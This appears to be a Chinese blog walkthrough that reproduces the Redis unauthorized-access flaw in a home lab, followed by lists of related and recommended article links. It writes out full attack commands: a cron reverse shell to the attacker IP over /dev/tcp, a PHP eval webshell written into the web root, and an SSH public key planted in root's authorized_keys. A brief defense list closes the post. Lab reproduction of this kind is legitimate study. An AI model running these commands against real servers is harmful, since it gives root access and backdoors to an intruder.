从0复现redis未授权访问漏洞

环境:centos8(ip:10.0.0.3) 安装 redis

工具:kali(10.1.1.136)

1. 介绍

Redis

REmote DIctionary Server(Redis) 是完全开源免费的,遵守BSD协议,Redis是一个由Salvatore Sanfilippo写的key-value存储系统。。

Redis 与其他它key - value 缓存产品有以下三个特点:

  • Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用。
  • Redis不仅仅支持简单的key-value类型的数据,同时还提供list,set,zset,hash等数据结构的存储。
  • Redis支持数据的备份,即master-slave模式的数据备份。

  Redis因配置不当可造成未授权访问。攻击者无需通过身份认证便可访问到内部数据,造成敏感信息泄露,也可以恶意执行flushall来清空所有数据。如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

2. 环境准备

kali作为攻击端。centos作为靶机~

安装redis

(建议用centos,之前用的vulhub中的redis未授权访问镜像,后面的操作都不行。别问为什么可以,也别问为什么不行,因为我是真滴不知道呀。只是跟着复现罢了,还真不知道原理。)

kali和centos都需要安装;

安装redis,kali和centos都跟着步骤走就行

配置redis远程访问

如下图设置:

  1. 注释掉bind 127.0.0.1

  1. proteced-mode改为no

  1. daemonize改为no

  1. requirepass随便设置

这个是连接时使用的密码。注释掉了就不用输入密码验证,如果不注释,就需要密码验证;

为了方便演示,尽量一次过关,我这里将密码设置为123456(即:去掉注释)

  1. 关闭centos防火墙

systemctl stop firewalld.service,重启系统后会开启防火墙;

所以可以考虑一下禁用防火墙,systemctl disable firewalld.service

感觉基本就搞完了。

测试远程访问:

centos开启redis服务:

进入:/usr/local/redis/bin,执行命令:./redis-server redis.conf

这个就因人而异。

至于为啥是前台启动(会显示页面),我也不知道为啥。这个环境配了从昨天配置到今天(能踩的坑都踩了一遍),能跑就已经谢天谢地了。

kali上进行连接:

或者也可以:

-p 6379可写可不写。指定端口嘛,默认端口是6379。

前面全是搭建环境的步骤,可以跟着上述方法来试试。毕竟环境配置出问题,真的劝退。下面就是正常步骤了。

3. 漏洞复现

1. 反弹shell(复现失败)

kali:检测目标端口是否开放:nmap -A -p 6379 -script redis-info 10.0.0.3

向目标写入任务计划,反弹shell

10.0.0.3:6379> set x "\n* * * * * bash -i >& /dev/tcp/10.1.1.136/888 0>&1\n"

10.0.0.3:6379> config set dir /var/spool/cron/

10.0.0.3:6379> config set dbfilename root

10.0.0.3:6379> save

kali侦听888端口

麻了,没反弹出来。但是从centos的redis前端可以看到已经保存到了磁盘;

找了一下其他的复现博客,有一个提到了要等一段时间,这个一段时间就不知道多久了。

麻了,过了很久,那就是复现不成功了。

唔不知道是不是因为版本问题。。。

2. 写入webshell(复现成功)

假如权限不高,可以考虑写入webshell(人麻了,才装的centos没装apache,php...)

centos8安装搭建PHP环境

指定目录的时候,目录要存在才不会报错,否则会报错

config set dir /var/www/html     设置web目录

config set dbfilename webshell.php  设置备份文件名

set shell "<?php @eval($_POST['shell']);?>"  设置值

最好是写入:

set shell "\r\n\r\n<?php @eval($_POST['shell']);?>\r\n\r\n"

save  保存

可以看到这里已经有了webshell.php

尝试访问和执行

3. ssh-keygen公钥然后使用私钥登陆

Centos8开启SSH服务

跟着下面的步骤走就行

kali进入:/root/.ssh目录

# ssh-keygen -t rsa  啥都不写,直接回车

# (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n")>1.txt

# cp 1.txt /root/redis-4.0.11/src/



kali进入:/root/redis-4.0.11/src/目录下

# cat 1.txt | ./redis-cli -h 10.0.0.3 -a 123456 -x set crack

# ./redis-cli -h 10.0.0.3 -a 123456

	> config set dir /root/.ssh

	> config set dbfilename authorized_keys

	> save

# ssh -i id_rsa root@10.0.0.3

4.防御方法

测试远程访问的修改方法反着走;

  1. 设置密码
  2. 设置访问ip
  3. 开启防火墙
  4. 修改服务端口..等等

参考

freebuff-Redis未授权访问漏洞的重现与利用

Redis未授权访问利用|验证

redis未授权访问漏洞——简单记录的更多相关文章

  1. Redis未授权访问漏洞的利用及防护

    Redis未授权访问漏洞的利用及防护 什么是Redis未授权访问漏洞? Redis在默认情况下,会绑定在0.0.0.0:6379.如果没有采取相关的安全策略,比如添加防火墙规则.避免其他非信任来源IP ...

  2. 10.Redis未授权访问漏洞复现与利用

    一.漏洞简介以及危害: 1.什么是redis未授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等 ...

  3. 浅谈Redis未授权访问漏洞

    Redis未授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等 ...

  4. 利用redis未授权访问漏洞(windows版)

    0x00 原理   首先需要知道的是,redis是一种非关系型数据库.它在默认情况下,绑定在0.0.0.0:6379 ,若不采取相关策略,比如添加防火墙限制非信任IP访问,会使得redis服务暴露到公 ...

  5. [ Redis ] Redis 未授权访问漏洞被利用,服务器登陆不上

    一.缘由: 突然有一天某台服务器远程登陆不上,试了好几个人的账号都行,顿时慌了,感觉服务器被黑.在终于找到一个还在登陆状态的同事后,经查看/ect/passwd 和/etc/passwd-异常,文件中 ...

  6. Redis 未授权访问漏洞(附Python脚本)

    0x01 环境搭建 #下载并安装 cd /tmp wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzf redis-.t ...

  7. docker搭建redis未授权访问漏洞环境

    这是redis未授权访问漏洞环境,可以使用该环境练习重置/etc/passwd文件从而重置root密码 环境我已经搭好放在了docker hub 可以使用命令docker search ju5ton1 ...

  8. redis未授权访问漏洞那拿SHELL

    一.什么是redis未授权访问漏洞: 1.redis是一种文档型数据库,快速高效,存储在内存中,定期才会写磁盘.主要用于快速缓存,数据转存处理等.默认redis开在6379端口,可以直接访问.并不需要 ...

  9. Redis未授权访问漏洞复现

    Redis未授权访问漏洞复现 一.漏洞描述 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没 ...

  10. [转帖]Redis未授权访问漏洞复现

    Redis未授权访问漏洞复现 https://www.cnblogs.com/yuzly/p/11663822.html config set dirconfig set dbfile xxxx 一. ...

随机推荐

  1. 论文解读丨【CVPR 2022】不使用人工标注提升文字识别器性能

    摘要:本文提出了一种针对文字识别的半监督方法.区别于常见的半监督方法,本文的针对文字识别这类序列识别问题做出了特定的设计. 本文分享自华为云社区<[CVPR 2022] 不使用人工标注提升文字识 ...

  2. 基于.NetCore开发博客项目 StarBlog - (24) 统一接口数据返回格式

    前言 开发接口,是给客户端(Web前端.App)用的,前面说的RESTFul,是接口的规范,有了统一的接口风格,客户端开发人员在访问后端功能的时候能更快找到需要的接口,能写出可维护性更高的代码. 而接 ...

  3. 前后端开发必会的 HTTP 协议“十全大补丸”(万字长文)

    本文全面介绍了 HTTP 协议相关知识,包括 HTTP 请求报文.响应报文.持久连接.缓存.Cookie 以及 HTTP 版本升级等! HTTP 协议全称为 HyperText Transfer Pr ...

  4. JAVA中使用最广泛的本地缓存?Ehcache的自信从何而来2 —— Ehcache的各种项目集成与使用初体验

    大家好,又见面了. 本文是笔者作为掘金技术社区签约作者的身份输出的缓存专栏系列内容,将会通过系列专题,讲清楚缓存的方方面面.如果感兴趣,欢迎关注以获取后续更新. 在上一篇文章<JAVA中使用最广 ...

  5. forms组件渲染标签、展示信息、校验数据的一些补充,forms组件参数和源码剖析,modelform组件,Django中间

    今日内容 forms组件渲染标签 forms组件渲染标签的方式1 <p>forms组件渲染标签的方式1</p> {{ form_obj.as_p }} {{ form_obj. ...

  6. group by 语句怎么优化?

    一.一个简单使用示例 我这里创建一张订单表 CREATE TABLE `order_info` ( `id` int NOT NULL AUTO_INCREMENT COMMENT '主键', `or ...

  7. IDEA 2022.1.3 配置 Tomcat 模板

    本地运行 Tomcat 首先,下载得到 Tomcat 压缩包 选择合适的位置解压,路径不要有中文和空格 结构如下所示 目录结构说明: bin 可执行文件目录 conf 配置文件目录 lib 存放lib ...

  8. Loj 507 接竹竿 题解

    Loj链接:接竹竿 $ {\scr \color {SkyBlue}{\text{Solution}}} $ 题目大意: 给定一个数组,每次加入一种颜色的数,可以取走与它颜色相同的两个数之间的所有数, ...

  9. 逐步讲解如何在 Proteus 中新建工程

    前言 Proteus 新建工程虽然不难,但对于电子小白来说可能便成了学习路上的绊脚石,本篇我将逐步讲解如何在 Proteus 中新建工程. 最新版 Proteus 8.15 最新版 Proteus 8 ...

  10. Coolify系列-手把手教学解决局域网局域网中的其他主机访问虚拟机以及docker服务

    背景 我在windows电脑安装了一个VM,使用VM开启了Linux服务器,运行docker,下载服务镜像,然后运行服务,然后遇到了主机无法访问服务的问题. 问题排查 STEP1:首先要开启防火墙端口 ...